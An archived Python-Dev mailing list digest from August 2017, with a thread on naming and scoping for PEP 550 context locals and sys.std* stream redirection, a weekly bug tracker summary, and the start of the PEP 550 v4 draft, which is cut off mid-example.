The remaining connection with "contextlib" would be that @contextlib.contextmanager (and its async counterpart) would implicitly clear the __context_locals__ attribute on the underlying generator instance so that context local state changes made there will affect the context where the context manager is actually being used. Cheers, Nick.
-- Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia From solipsis at pitrou.net Fri Aug 25 06:28:08 2017 From: solipsis at pitrou.net (Antoine Pitrou) Date: Fri, 25 Aug 2017 12:28:08 +0200 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) References: Message-ID: <20170825122808.59dd6a6f@fsol> On Fri, 25 Aug 2017 15:36:55 +1000 Nick Coghlan wrote: > On 24 August 2017 at 23:52, Barry Warsaw wrote: > > Guido van Rossum wrote: > >> On Tue, Aug 22, 2017 at 7:12 PM, Nathaniel Smith wrote: > >> > >> I worry that that's going to lead more people astray thinking this has > >> something to do with contextlib, which it really doesn't (it's much more > >> closely related to threading.local()). > > > > This is my problem with using "Context" for this PEP. Although I can't > > keep up with all names being thrown around, it seems to me that in > > Python we already have a well-established meaning for "contexts" -- > > context managers, and the protocols they implement as they participate > > in `with` statements. We have contextlib which reinforces this. What's > > being proposed in PEP 550 is so far removed from this concept that I > > think it's just going to cause confusion (well, it does in me anyway!). > > While I understand the concern, I think context locals and contextlib > are more closely related than folks realise, as one of the main > problems that the PEP is aiming to solve is that with statements (and > hence context managers) *do not work as expected* when their body > includes "yield", "yield from" or "await". If I write:

    def read_chunks(fn, chunk_size=8192):
        with open(fn, "rb") as f:
            while True:
                data = f.read(chunk_size)
                if not data:
                    break
                yield data

The "with" statement here works fine even though its body includes a "yield" (and if there had been an added "await" things would probably not be different). The class of context managers you're talking about is in my experience a small minority (I've hardly ever used them myself, and I don't think I have ever written one). So I don't think the two concepts are as closely related as you seem to think. That said, I also think "context" is the best term (barring "environment" perhaps) to describe what PEP 550 is talking about. Qualifying it ("logical", etc.) helps disambiguate. Regards Antoine. From ncoghlan at gmail.com Fri Aug 25 09:23:52 2017 From: ncoghlan at gmail.com (Nick Coghlan) Date: Fri, 25 Aug 2017 23:23:52 +1000 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) In-Reply-To: <20170825122808.59dd6a6f@fsol> References: <20170825122808.59dd6a6f@fsol> Message-ID: On 25 August 2017 at 20:28, Antoine Pitrou wrote: > On Fri, 25 Aug 2017 15:36:55 +1000 > Nick Coghlan wrote: >> On 24 August 2017 at 23:52, Barry Warsaw wrote: >> > Guido van Rossum wrote: >> >> On Tue, Aug 22, 2017 at 7:12 PM, Nathaniel Smith wrote: >> >> >> >> I worry that that's going to lead more people astray thinking this has >> >> something to do with contextlib, which it really doesn't (it's much more >> >> closely related to threading.local()). >> > >> > This is my problem with using "Context" for this PEP. Although I can't >> > keep up with all names being thrown around, it seems to me that in >> > Python we already have a well-established meaning for "contexts" -- >> > context managers, and the protocols they implement as they participate >> > in `with` statements. We have contextlib which reinforces this.
What's >> > being proposed in PEP 550 is so far removed from this concept that I >> > think it's just going to cause confusion (well, it does in me anyway!). >> >> While I understand the concern, I think context locals and contextlib >> are more closely related than folks realise, as one of the main >> problems that the PEP is aiming to solve is that with statements (and >> hence context managers) *do not work as expected* when their body >> includes "yield", "yield from" or "await". > > If I write:
>
>     def read_chunks(fn, chunk_size=8192):
>         with open(fn, "rb") as f:
>             while True:
>                 data = f.read(chunk_size)
>                 if not data:
>                     break
>                 yield data
>
> The "with" statement here works fine even though its body includes a
> "yield" (and if there had been an added "await" things would probably
> not be different).
>
> The class of context managers you're talking about is in my experience a
> small minority (I've hardly ever used them myself, and I don't think I
> have ever written one).

I actually agree with this, as the vast majority of context managers are about managing the state of frame locals, rather than messing about with implicitly shared state. It's similar to the way that thread locals are vastly outnumbered by ordinary frame locals. That's part of what motivated my suggested distinction between explicit context (such as your example here) and implicit context (the trickier cases that PEP 550 aims to help handle). > So I don't think the two concepts are as > closely related as you seem to think. Of the 12 examples in https://www.python.org/dev/peps/pep-0343/#examples, two of them relate to manipulating the decimal thread local context, and a third relates to manipulating a hidden "queue signals for later or process them immediately?" flag, so the use cases that PEP 550 covers have always been an intended subset of the use cases that PEP 343 covers. It's just that the explicit use cases either already work sensibly in the face of frame suspension (e.g. keeping a file open, since you're still using it), or have other reasons why you wouldn't want to suspend the frame after entering that particular context (e.g. if you suspend a frame with a lock held, there's no real way for the interpreter to guess whether that's intentional or not, so it has to assume keeping it locked is intentional, and expect you to release it explicitly if that's what you want). And while PEP 550 doesn't handle the stream redirection case natively (since it doesn't allow for suspend/resume callbacks the way PEP 525 does), it at least allows for the development of a context-aware output stream wrapper API where:

* you replace the target stream globally with a context-aware wrapper that delegates attribute access to a particular context local if that's set and to the original stream otherwise
* you have a context manager that sets & reverts the context local variable rather than manipulating the process global state directly

> That said, I also think "context" is the best term (barring > "environment" perhaps) to describe what PEP 550 is talking about. > Qualifying it ("logical", etc.) helps disambiguate. +1 Cheers, Nick. -- Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia From yselivanov.ml at gmail.com Fri Aug 25 09:36:58 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Fri, 25 Aug 2017 09:36:58 -0400 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) In-Reply-To: References: <20170825122808.59dd6a6f@fsol> Message-ID: On Fri, Aug 25, 2017 at 9:23 AM, Nick Coghlan wrote: [..]
> And while PEP 550 doesn't handle the stream redirection case natively > (since it doesn't allow for suspend/resume callbacks the way PEP 525 > does), it at least allows for the development of a context-aware > output stream wrapper API where: PEP 525 can't handle stream redirection -- it can do it only for single-threaded programs. sys.stdout/stderr/stdin are global variables, that's how the API is specified. API users assume that the change is process-wide. Yury From ncoghlan at gmail.com Fri Aug 25 09:48:25 2017 From: ncoghlan at gmail.com (Nick Coghlan) Date: Fri, 25 Aug 2017 23:48:25 +1000 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) In-Reply-To: References: <20170825122808.59dd6a6f@fsol> Message-ID: On 25 August 2017 at 23:36, Yury Selivanov wrote: > On Fri, Aug 25, 2017 at 9:23 AM, Nick Coghlan wrote: > [..] >> And while PEP 550 doesn't handle the stream redirection case natively >> (since it doesn't allow for suspend/resume callbacks the way PEP 525 >> does), it at least allows for the development of a context-aware >> output stream wrapper API where: > > PEP 525 can't handle stream redirection -- it can do it only for > single-threaded programs. Good point, whereas the hypothetical context-aware wrapper I proposed would be both thread-safe (since the process global would be changed once before the program went multi-threaded and then left alone) *and* potentially lower overhead (one context local lookup per stream attribute access, rather than a global state change every time a frame was suspended or resumed with a stream redirected). > sys.stdout/stderr/stdin are global variables, that's how the API is > specified. API users assume that the change is process-wide. Yeah, I wasn't suggesting any implicit changes to the way those work. However, it does occur to me that if we did add a new "contextlocals" API, then:

1. It could offer context-aware wrappers for stdin/stdout/stderr
2. It could offer context-aware alternatives to the stream redirection context managers in contextlib

That approach would work even better than replacing sys.stdin/out/err themselves with wrappers, since the wrappers wouldn't be vulnerable to being overwritten by other code that mutated the sys module. Anyway, that's not a serious proposal right now, but I do think it's decent validation of the power and flexibility of the proposed implicit state management model. Cheers, Nick. -- Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia From yselivanov.ml at gmail.com Fri Aug 25 10:18:55 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Fri, 25 Aug 2017 10:18:55 -0400 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) In-Reply-To: References: <20170825122808.59dd6a6f@fsol> Message-ID: Right, Nick, I missed the part that you want to have a file-like wrapper stored in sys.std* streams that would redirect lookups/calls to the relevant real file-object in the current context (correct?) I had a similar idea when I discovered that PEP 550 can't be used directly to fix sys.std* stream redirection. Another idea:

1. We alter PyModule to make it possible to add properties (descriptor protocol, or we implement custom __getattr__). I think we can make it so that only the sys module would be able to actually use it, so it's not going to be a new feature -- just a hack for CPython.

2. We make sys.std* attributes properties, with getters and setters.

3. sys.std* setters will: issue a DeprecationWarning; set whatever the user wants to set in a global variable + set a flag (let's call it "sys.__stdout_global_modified") that sys.std* were modified.

4. sys.std* getters will use PEP 550 to look up the value when __stdout_global_modified is false. If it's true -- we fall back to globals.

5. We deprecate the current API and add new APIs for the redirection system that uses PEP 550 explicitly.

6. In Python 4 we remove the old sys.std* API.

This is still *very* fragile: any code that writes to sys.stdout breaks all assumptions. But it offers a way to raise a warning when the old API is being used - something that we'll probably need if we add new APIs to fix this problem. Yury From barry at python.org Fri Aug 25 11:10:30 2017 From: barry at python.org (Barry Warsaw) Date: Fri, 25 Aug 2017 11:10:30 -0400 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) In-Reply-To: References: <20170825122808.59dd6a6f@fsol> Message-ID: <638C37AA-1E55-46DC-9017-4E94B222F89C@python.org> On Aug 25, 2017, at 10:18, Yury Selivanov wrote:
>
> I had a similar idea when I discovered that PEP 550 can't be used
> directly to fix sys.std* stream redirection. Another idea:
>
> 1. We alter PyModule to make it possible to add properties (descriptor
> protocol, or we implement custom __getattr__). I think we can make it
> so that only the sys module would be able to actually use it, so it's not
> going to be a new feature -- just a hack for CPython.
>
> 2. We make sys.std* attributes properties, with getters and setters.
>
> 3. sys.std* setters will: issue a DeprecationWarning; set whatever the
> user wants to set in a global variable + set a flag (let's call it
> "sys.__stdout_global_modified") that sys.std* were modified.
>
> 4. sys.std* getters will use PEP 550 to look up the value when
> __stdout_global_modified is false. If it's true -- we fall back to
> globals.
>
> 5. We deprecate the current API and add new APIs for the redirection
> system that uses PEP 550 explicitly.
>
> 6. In Python 4 we remove the old sys.std* API.
>
> This is still *very* fragile: any code that writes to sys.stdout
> breaks all assumptions. But it offers a way to raise a warning when
> the old API is being used - something that we'll probably need if we add
> new APIs to fix this problem.

It's ideas like this that do make me think of scopes when talking about global state and execution contexts. I understand that the current PEP 550 invokes an explicit separate namespace, but thinking bigger, if the usual patterns of just writing to sys.std{out,err} still worked and in the presence of single "threaded" execution it just did the normal thing, but in the presence of threads, async, etc. it *also* did the right thing, then code wouldn't need to change just because you started to adopt async. That implies some scoping rules to make "sys.stdout" refer to the local execution's sys.stdout if it were set, and the global sys.stdout if it were not. This would of course be a much deeper change to Python, with lots of tricky semantics and corner cases to get right. But it might be worth it to provide an execution model and an API that would be harder to get wrong because Python just Does the Right Thing. It's difficult because you also have to be able to reason about what's going on, and it'll be imperative to be able to debug and examine the state of your execution when things go unexpected. That's always harder when mixing dynamic scope with lexical scope, which I think is what PEP 550 is ultimately getting at.
Cheers, -Barry -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 833 bytes Desc: Message signed with OpenPGP URL: From ericsnowcurrently at gmail.com Fri Aug 25 11:15:03 2017 From: ericsnowcurrently at gmail.com (Eric Snow) Date: Fri, 25 Aug 2017 09:15:03 -0600 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) In-Reply-To: References: <20170825122808.59dd6a6f@fsol> Message-ID: On Fri, Aug 25, 2017 at 8:18 AM, Yury Selivanov wrote: > Another idea: > > 1. We alter PyModule to make it possible to add properties (descriptor > protocol, or we implement custom __getattr__). I think we can make it > so that only the sys module would be able to actually use it, so it's not > going to be a new feature -- just a hack for CPython. FWIW, I've been toying with a similar problem and solution for a while. I'd like to clean up the sys module, including grouping some of the attributes (e.g. the import state), turn the get/set pairs into properties, and deprecate direct usage of some of the attributes. Though supporting descriptors on module objects would work [1] and be useful (particularly for deprecating module attrs), it's sufficiently worthy of a PEP that I haven't taken the time. Instead, the approach I settled on was to rename sys to _sys and add a sys written in Python that proxies _sys. Here's a rough first pass: https://github.com/ericsnowcurrently/cpython/tree/sys-module It's effectively the same thing as ModuleType supporting descriptors, but specific only to sys. One problem with both approaches is that we'd be changing the type of the sys module. There's a relatively common idiom in the stdlib (and elsewhere) of using "type(sys)" to get ModuleType. Changing the type of the sys module breaks that. -eric [1] This is doable with a custom __getattribute__ on ModuleType, though it will impact attribute lookup on all modules. I suppose there could be a subclass that does the right thing... Anyway, this is more python-ideas territory. From yselivanov.ml at gmail.com Fri Aug 25 11:30:12 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Fri, 25 Aug 2017 11:30:12 -0400 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) In-Reply-To: <638C37AA-1E55-46DC-9017-4E94B222F89C@python.org> References: <20170825122808.59dd6a6f@fsol> <638C37AA-1E55-46DC-9017-4E94B222F89C@python.org> Message-ID: On Fri, Aug 25, 2017 at 11:10 AM, Barry Warsaw wrote: [..] > It's ideas like this that do make me think of scopes when talking about global state and execution contexts. I understand that the current PEP 550 invokes an explicit separate namespace, but thinking bigger, if the usual patterns of just writing to sys.std{out,err} still worked and in the presence of single "threaded" execution it just did the normal thing, but in the presence of threads, async, etc. it *also* did the right thing, then code wouldn't need to change just because you started to adopt async. That implies some scoping rules to make "sys.stdout" refer to the local execution's sys.stdout if it were set, and the global sys.stdout if it were not. The problem here is exactly the "usual patterns of just writing to sys.std{out,err}". The usual pattern assumes that it's a global variable, and there are no ways of getting around this. None.
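For instance, a minimal illustration of today's process-wide semantics (using only behavior that exists in the current stdlib; the file name is arbitrary):

    import sys
    import threading

    sys.stdout = open('log.txt', 'w')   # affects *every* thread in the process

    def worker():
        print('hello from a thread')    # ends up in log.txt, not the console

    t = threading.Thread(target=worker)
    t.start()
    t.join()
    sys.stdout.flush()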
There are many applications out there that are already written with the assumption that setting sys.stdout changes it for all threads, which means that we cannot change these already established semantics. The sys.std* API just needs to be slowly deprecated and replaced with a new API that uses context managers and does things differently under the hood -- *if*, and only if, we all agree that we even need to solve this problem. This is a completely separate problem from the one that PEP 550 solves, which is providing a better TLS that is aware of generators and async code. Yury From ericsnowcurrently at gmail.com Fri Aug 25 11:33:15 2017 From: ericsnowcurrently at gmail.com (Eric Snow) Date: Fri, 25 Aug 2017 09:33:15 -0600 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) In-Reply-To: <638C37AA-1E55-46DC-9017-4E94B222F89C@python.org> References: <20170825122808.59dd6a6f@fsol> <638C37AA-1E55-46DC-9017-4E94B222F89C@python.org> Message-ID: On Fri, Aug 25, 2017 at 9:10 AM, Barry Warsaw wrote: > It's ideas like this that do make me think of scopes when talking about global state and execution contexts. I understand that the current PEP 550 invokes an explicit separate namespace, Right. The observation that PEP 550 proposes a separate stack of scopes from the lexical scope is an important one. > but thinking bigger, if the usual patterns of just writing to sys.std{out,err} still worked and in the presence of single "threaded" execution it just did the normal thing, but in the presence of threads, async, etc. it *also* did the right thing, then code wouldn't need to change just because you started to adopt async. That implies some scoping rules to make "sys.stdout" refer to the local execution's sys.stdout if it were set, and the global sys.stdout if it were not. Yeah, at the bottom of the PEP 550 stack there'd need to be a proxy to the relevant global state. While working on the successor to PEP 406 (import state), I realized I'd need something like this. > > This would of course be a much deeper change to Python, with lots of tricky semantics and corner cases to get right. But it might be worth it to provide an execution model and an API that would be harder to get wrong because Python just Does the Right Thing. It's difficult because you also have to be able to reason about what's going on, and it'll be imperative to be able to debug and examine the state of your execution when things go unexpected. That's always harder when mixing dynamic scope with lexical scope, which I think is what PEP 550 is ultimately getting at. +1 Thankfully, PEP 550 is targeted more at a subset of library authors than at the general population. -eric From guido at python.org Fri Aug 25 11:41:47 2017 From: guido at python.org (Guido van Rossum) Date: Fri, 25 Aug 2017 08:41:47 -0700 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) In-Reply-To: References: <20170825122808.59dd6a6f@fsol> <638C37AA-1E55-46DC-9017-4E94B222F89C@python.org> Message-ID: I think the issue with sys.std* is a distraction for this discussion. The issue also seems overstated, and I wouldn't want to change it. The ability to set these is mostly used in small programs that are also single-threaded. Libraries should never mess with them -- it's easy to explicitly pass an output file around, and for errors you should use logging or in a pinch you can write to sys.stderr, but you shouldn't set it. -- --Guido van Rossum (python.org/~guido) -------------- next part -------------- An HTML attachment was scrubbed...
URL: From status at bugs.python.org Fri Aug 25 12:09:17 2017 From: status at bugs.python.org (Python tracker) Date: Fri, 25 Aug 2017 18:09:17 +0200 (CEST) Subject: [Python-Dev] Summary of Python tracker Issues Message-ID: <20170825160917.F24D356B7C@psf.upfronthosting.co.za> ACTIVITY SUMMARY (2017-08-18 - 2017-08-25) Python tracker at http://bugs.python.org/ To view or respond to any of the issues listed below, click on the issue. Do NOT respond to this message. Issues counts and deltas: open 6149 (+16) closed 36880 (+28) total 43029 (+44) Open issues with patches: 2342 Issues opened (28) ================== #30871: Add test.pythoninfo http://bugs.python.org/issue30871 reopened by haypo #31233: socketserver.ThreadingMixIn leaks running threads after server http://bugs.python.org/issue31233 opened by haypo #31234: Make support.threading_cleanup() stricter http://bugs.python.org/issue31234 opened by haypo #31237: test_gdb disables 25% of tests in optimized builds http://bugs.python.org/issue31237 opened by lukasz.langa #31241: ast col_offset wrong for list comprehensions, generators and t http://bugs.python.org/issue31241 opened by samuelcolvin #31242: Add SSLContext.set_verify_callback() http://bugs.python.org/issue31242 opened by rfinnie #31243: checks whether PyArg_ParseTuple returned a negative int http://bugs.python.org/issue31243 opened by Oren Milman #31244: IDLE: work around shortcuts bug in Windows' IMEs and tk http://bugs.python.org/issue31244 opened by Constantine Ketskalo #31245: Asyncio UNIX socket and SOCK_DGRAM http://bugs.python.org/issue31245 opened by qdawans #31246: [2.7] test_signal.test_setitimer_tiny() fails randomly on x86- http://bugs.python.org/issue31246 opened by haypo #31248: method wrapper type has invalid __name__/__qualname__ 'method- http://bugs.python.org/issue31248 opened by bup #31249: test_concurrent_futures leaks dangling threads http://bugs.python.org/issue31249 opened by haypo #31250: test_asyncio leaks dangling threads http://bugs.python.org/issue31250 opened by haypo #31252: Operator.itemgetter documentation should include dictionary ke http://bugs.python.org/issue31252 opened by ashishnitinpatil #31254: WeakKeyDictionary/Mapping doesn't call __missing__ http://bugs.python.org/issue31254 opened by Antony.Lee #31256: xml.etree.ElementTree: add support for doctype in tostring met http://bugs.python.org/issue31256 opened by bastik #31258: [2.7] Enhance support reap_children() and threading_cleanup() http://bugs.python.org/issue31258 opened by haypo #31259: [3.6] Enhance support reap_children() and threading_cleanup() http://bugs.python.org/issue31259 opened by haypo #31260: [2.7] Enhance PC/VS9.0/ project to produce python.bat, as PCbu http://bugs.python.org/issue31260 opened by haypo #31265: Remove doubly-linked list from C OrderedDict http://bugs.python.org/issue31265 opened by inada.naoki #31267: threading.Timer object is affected by changes to system time http://bugs.python.org/issue31267 opened by winfreak #31270: Simplify documentation of itertools.zip_longest http://bugs.python.org/issue31270 opened by rami #31271: an assertion failure in io.TextIOWrapper.write http://bugs.python.org/issue31271 opened by Oren Milman #31272: typing module conflicts with __slots__-classes http://bugs.python.org/issue31272 opened by grayfall #31273: Unicode support in TestCase.skip http://bugs.python.org/issue31273 opened by Nathan Buckner #31274: Support building against homebrew on macOS http://bugs.python.org/issue31274 opened by barry #31275: Check fall-through in 
_codecs_iso2022.c http://bugs.python.org/issue31275 opened by skrah #31276: PyObject_CallFinalizerFromDealloc is undocumented http://bugs.python.org/issue31276 opened by pv Most recent 15 issues with no replies (15) ========================================== #31276: PyObject_CallFinalizerFromDealloc is undocumented http://bugs.python.org/issue31276 #31273: Unicode support in TestCase.skip http://bugs.python.org/issue31273 #31272: typing module conflicts with __slots__-classes http://bugs.python.org/issue31272 #31267: threading.Timer object is affected by changes to system time http://bugs.python.org/issue31267 #31260: [2.7] Enhance PC/VS9.0/ project to produce python.bat, as PCbu http://bugs.python.org/issue31260 #31256: xml.etree.ElementTree: add support for doctype in tostring met http://bugs.python.org/issue31256 #31250: test_asyncio leaks dangling threads http://bugs.python.org/issue31250 #31248: method wrapper type has invalid __name__/__qualname__ 'method- http://bugs.python.org/issue31248 #31245: Asyncio UNIX socket and SOCK_DGRAM http://bugs.python.org/issue31245 #31242: Add SSLContext.set_verify_callback() http://bugs.python.org/issue31242 #31241: ast col_offset wrong for list comprehensions, generators and t http://bugs.python.org/issue31241 #31224: Missing definition of frozen module http://bugs.python.org/issue31224 #31207: IDLE, configdialog: Factor out ExtPage class from ConfigDialog http://bugs.python.org/issue31207 #31202: Windows pathlib.Path.glob(pattern) fixed part of the pattern c http://bugs.python.org/issue31202 #31196: Blank line inconsistency between InteractiveConsole and standa http://bugs.python.org/issue31196 Most recent 15 issues waiting for review (15) ============================================= #31270: Simplify documentation of itertools.zip_longest http://bugs.python.org/issue31270 #31185: Miscellaneous errors in asyncio speedup module http://bugs.python.org/issue31185 #31184: Fix data descriptor detection in inspect.getattr_static http://bugs.python.org/issue31184 #31179: Speed-up dict.copy() up to 5.5 times. http://bugs.python.org/issue31179 #31178: [EASY] subprocess: TypeError: can't concat str to bytes, in _e http://bugs.python.org/issue31178 #31175: Exception while extracting file from ZIP with non-matching fil http://bugs.python.org/issue31175 #31151: socketserver.ForkingMixIn.server_close() leaks zombie processe http://bugs.python.org/issue31151 #31120: [2.7] Python 64 bit _ssl compile fails due missing buildinf_am http://bugs.python.org/issue31120 #31113: Stack overflow with large program http://bugs.python.org/issue31113 #31108: add __contains__ for list_iterator (and others) for better per http://bugs.python.org/issue31108 #31106: os.posix_fallocate() generate exception with errno 0 http://bugs.python.org/issue31106 #31046: ensurepip does not honour the value of $(prefix) http://bugs.python.org/issue31046 #31021: Clarify programming faq. 
http://bugs.python.org/issue31021 #31020: Add support for custom compressor in tarfile http://bugs.python.org/issue31020 #31015: PyErr_WriteUnraisable should be more verbose in Python 2.7 http://bugs.python.org/issue31015 Top 10 most discussed issues (10) ================================= #31234: Make support.threading_cleanup() stricter http://bugs.python.org/issue31234 13 msgs #31095: Checking all tp_dealloc with Py_TPFLAGS_HAVE_GC http://bugs.python.org/issue31095 11 msgs #31244: IDLE: work around shortcuts bug in Windows' IMEs and tk http://bugs.python.org/issue31244 11 msgs #31254: WeakKeyDictionary/Mapping doesn't call __missing__ http://bugs.python.org/issue31254 11 msgs #14976: queue.Queue() is not reentrant, so signals and GC can cause de http://bugs.python.org/issue14976 8 msgs #31265: Remove doubly-linked list from C OrderedDict http://bugs.python.org/issue31265 8 msgs #27099: IDLE: turn builting extensions into regular modules http://bugs.python.org/issue27099 7 msgs #30871: Add test.pythoninfo http://bugs.python.org/issue30871 7 msgs #31271: an assertion failure in io.TextIOWrapper.write http://bugs.python.org/issue31271 6 msgs #28261: wrong error messages when using PyArg_ParseTuple to parse norm http://bugs.python.org/issue28261 5 msgs Issues closed (27) ================== #28777: Add asyncio.Queue __aiter__, __anext__ methods http://bugs.python.org/issue28777 closed by gvanrossum #30923: Add -Wimplicit-fallthrough=0 to Makefile ? http://bugs.python.org/issue30923 closed by skrah #31024: typing.Tuple is class but is defined as data inside https://do http://bugs.python.org/issue31024 closed by levkivskyi #31109: zipimport argument clinic conversion http://bugs.python.org/issue31109 closed by brett.cannon #31118: Make super() work with staticmethod by using __class__ for bot http://bugs.python.org/issue31118 closed by ncoghlan #31161: Only check for print and exec parentheses cases for SyntaxErro http://bugs.python.org/issue31161 closed by lukasz.langa #31183: `Dis` module doesn't know how to disassemble async generator o http://bugs.python.org/issue31183 closed by ncoghlan #31206: IDLE, configdialog: Factor out HighPage class from ConfigDialo http://bugs.python.org/issue31206 closed by terry.reedy #31229: wrong error messages when too many kwargs are received http://bugs.python.org/issue31229 closed by serhiy.storchaka #31232: Backport the new custom "print >> sys.stderr" error message? 
http://bugs.python.org/issue31232 closed by ncoghlan #31235: test_logging: ResourceWarning: unclosed http://bugs.python.org/issue31235 closed by haypo #31236: improve some error messages of min() and max() http://bugs.python.org/issue31236 closed by serhiy.storchaka #31238: pydoc: ServerThread.stop() leaves a dangling thread http://bugs.python.org/issue31238 closed by haypo #31239: namedtuple comparison ignores types http://bugs.python.org/issue31239 closed by r.david.murray #31240: Add lazy evaluation support for dict.setdefault() http://bugs.python.org/issue31240 closed by serhiy.storchaka #31247: test_xmlrpc leaks dangling threads http://bugs.python.org/issue31247 closed by haypo #31251: Diameter protocol in Python http://bugs.python.org/issue31251 closed by serhiy.storchaka #31253: Python fails to parse triple quoted (commented out) code http://bugs.python.org/issue31253 closed by quamrana #31255: Test getrandom before using it http://bugs.python.org/issue31255 closed by heroxbd #31257: importlib race condition http://bugs.python.org/issue31257 closed by haypo #31261: unittest fails to properly destruct objects created during set http://bugs.python.org/issue31261 closed by r.david.murray #31262: Documentation Error http://bugs.python.org/issue31262 closed by r.david.murray #31263: Assigning to subscript/slice of literal is permitted http://bugs.python.org/issue31263 closed by r.david.murray #31264: Import Package/Module through HTTP/S repository http://bugs.python.org/issue31264 closed by r.david.murray #31266: attribute error http://bugs.python.org/issue31266 closed by nixster #31268: Inconsistent socket timeout exception http://bugs.python.org/issue31268 closed by desbma #31269: bug in islink() and is_symlink() http://bugs.python.org/issue31269 closed by r.david.murray From yselivanov.ml at gmail.com Fri Aug 25 18:32:22 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Fri, 25 Aug 2017 18:32:22 -0400 Subject: [Python-Dev] PEP 550 v4 Message-ID: Hi, This is the 4th iteration of the PEP that Elvis and I have rewritten from scratch. The specification section has been separated from the implementation section, which makes them easier to follow. During the rewrite, we realized that generators and coroutines should work with the EC in exactly the same way (coroutines used to be created with no LC in prior versions of the PEP). We also renamed Context Keys to Context Variables, which seems to be a more appropriate name. Hopefully this update will resolve the remaining questions about the specification and the proposed implementation, and will allow us to focus on refining the API. Yury

PEP: 550
Title: Execution Context
Version: $Revision$
Last-Modified: $Date$
Author: Yury Selivanov, Elvis Pranskevichus
Status: Draft
Type: Standards Track
Content-Type: text/x-rst
Created: 11-Aug-2017
Python-Version: 3.7
Post-History: 11-Aug-2017, 15-Aug-2017, 18-Aug-2017, 25-Aug-2017

Abstract
========

This PEP adds a new generic mechanism of ensuring consistent access to non-local state in the context of out-of-order execution, such as in Python generators and coroutines. Thread-local storage, such as ``threading.local()``, is inadequate for programs that execute concurrently in the same OS thread. This PEP proposes a solution to this problem.

Rationale
=========

Prior to the advent of asynchronous programming in Python, programs used OS threads to achieve concurrency. The need for thread-specific state was solved by ``threading.local()`` and its C-API equivalent, ``PyThreadState_GetDict()``.
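For reference, the classic TLS pattern that this PEP generalizes looks roughly like the following minimal sketch (the helper names here are illustrative only)::

    import threading

    _local = threading.local()

    def set_precision(prec):
        # Each OS thread observes its own value of ``_local.prec``.
        _local.prec = prec

    def get_precision(default=28):
        return getattr(_local, 'prec', default)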
A few examples of where thread-local storage (TLS) is commonly
relied upon:

* Context managers like decimal contexts, ``numpy.errstate``,
  and ``warnings.catch_warnings``.

* Request-related data, such as security tokens and request data
  in web applications, language context for ``gettext``, etc.

* Profiling, tracing, and logging in large code bases.


Unfortunately, TLS does not work well for programs which execute
concurrently in a single thread.  A Python generator is the simplest
example of a concurrent program.  Consider the following::

    def fractions(precision, x, y):
        with decimal.localcontext() as ctx:
            ctx.prec = precision
            yield Decimal(x) / Decimal(y)
            yield Decimal(x) / Decimal(y**2)

    g1 = fractions(precision=2, x=1, y=3)
    g2 = fractions(precision=6, x=2, y=3)

    items = list(zip(g1, g2))

The expected value of ``items`` is::

    [(Decimal('0.33'), Decimal('0.666667')),
     (Decimal('0.11'), Decimal('0.222222'))]

Rather surprisingly, the actual result is::

    [(Decimal('0.33'), Decimal('0.666667')),
     (Decimal('0.111111'), Decimal('0.222222'))]

This is because the decimal context is stored as a thread-local, so
concurrent iteration of the ``fractions()`` generator corrupts the
state.  A similar problem exists with coroutines.

Applications also often need to associate certain data with a given
thread of execution.  For example, a web application server commonly
needs access to the current HTTP request object.

The inadequacy of TLS in asynchronous code has led to the
proliferation of ad-hoc solutions, which are limited in scope and
do not support all required use cases.

The current status quo is that any library (including the standard
library) that relies on TLS is likely to be broken when used in
asynchronous code or with generators (see [3]_ for an example
issue).

Some languages that support coroutines or generators recommend
passing the context manually as an argument to every function; see
[1]_ for an example.  This approach, however, has limited use for
Python, where there is a large ecosystem that was built to work with
a TLS-like context.  Furthermore, libraries like ``decimal`` or
``numpy`` rely on context implicitly in overloaded operator
implementations.

The .NET runtime, which has support for async/await, has a generic
solution for this problem, called ``ExecutionContext`` (see [2]_).


Goals
=====

The goal of this PEP is to provide a more reliable
``threading.local()`` alternative, which:

* provides the mechanism and the API to fix non-local state issues
  with coroutines and generators;

* has no or negligible performance impact on the existing code or
  the code that will be using the new mechanism, including
  libraries like ``decimal`` and ``numpy``.


High-Level Specification
========================

The full specification of this PEP is broken down into three parts:

* High-Level Specification (this section): the description of the
  overall solution.  We show how it applies to generators and
  coroutines in user code, without delving into implementation
  details.

* Detailed Specification: the complete description of new concepts,
  APIs, and related changes to the standard library.

* Implementation Details: the description and analysis of data
  structures and algorithms used to implement this PEP, as well as
  the necessary changes to CPython.

For the purpose of this section, we define *execution context* as an
opaque container of non-local state that allows consistent access to
its contents in the concurrent execution environment.

A *context variable* is an object representing a value in the
execution context.
A new context variable is created by calling
the ``new_context_var()`` function.  A context variable object has
two methods:

* ``lookup()``: returns the value of the variable in the current
  execution context;

* ``set()``: sets the value of the variable in the current
  execution context.


Regular Single-threaded Code
----------------------------

In regular, single-threaded code that doesn't involve generators or
coroutines, context variables behave like globals::

    var = new_context_var()

    def sub():
        assert var.lookup() == 'main'
        var.set('sub')

    def main():
        var.set('main')
        sub()
        assert var.lookup() == 'sub'


Multithreaded Code
------------------

In multithreaded code, context variables behave like thread locals::

    var = new_context_var()

    def sub():
        assert var.lookup() is None  # The execution context is empty
                                     # for each new thread.
        var.set('sub')

    def main():
        var.set('main')

        thread = threading.Thread(target=sub)
        thread.start()
        thread.join()

        assert var.lookup() == 'main'


Generators
----------

In generators, changes to context variables are local and are not
visible to the caller, but are visible to the code called by the
generator.  Once set in the generator, the context variable is
guaranteed not to change between iterations::

    var = new_context_var()

    def gen():
